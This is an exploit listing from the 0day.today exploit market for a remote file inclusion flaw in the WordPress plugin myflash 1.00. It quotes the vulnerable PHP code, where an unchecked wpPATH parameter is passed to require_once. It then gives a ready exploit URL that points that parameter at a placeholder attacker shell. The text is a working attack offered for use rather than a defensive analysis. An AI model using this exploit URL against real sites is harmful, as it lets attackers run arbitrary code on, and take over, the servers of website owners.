[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Wordpress plugin myflash <= 1.00 (wppath) RFI Vulnerability

Author
Crackers_Child
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1812
Category
web applications
Date add
30-04-2007
Platform
unsorted
===========================================================
Wordpress plugin myflash <= 1.00 (wppath) RFI Vulnerability
===========================================================


--------------------------------- [ Oyle Kahpe Ki Dunya ! ] --------------------------------------

Title : Wordpress plugin myflash <= V1.00  (wppath) RFI Vulnerability

--------------------------------------------------------------------------------
#Author: Crackers_Child

--------------------------------------------------------------------------------


------------------------- -------------------------------------------------------

Application :  Wordpress plugin

--------------------------------------------------------------------------------
Vuln In  myflash-button.php

if (!$_POST) $wppath=$_GET['wpPATH'];
else $wppath=$_POST['wpPATH'];

require_once($wppath.'/wp-config.php');
require_once($wppath.'/wp-admin/admin.php');

global $wpdb;
--------------------------------------------------------------------------------

Exploit:

http://[target]/_path]/wp-content/plugins/myflash/myflash-button.php?wpPATH=Shl3?

--------------------------------------------------------------------------------

greets:

Every Body

--------------------------------------------------------------------------------



#  0day.today [2024-11-16]  #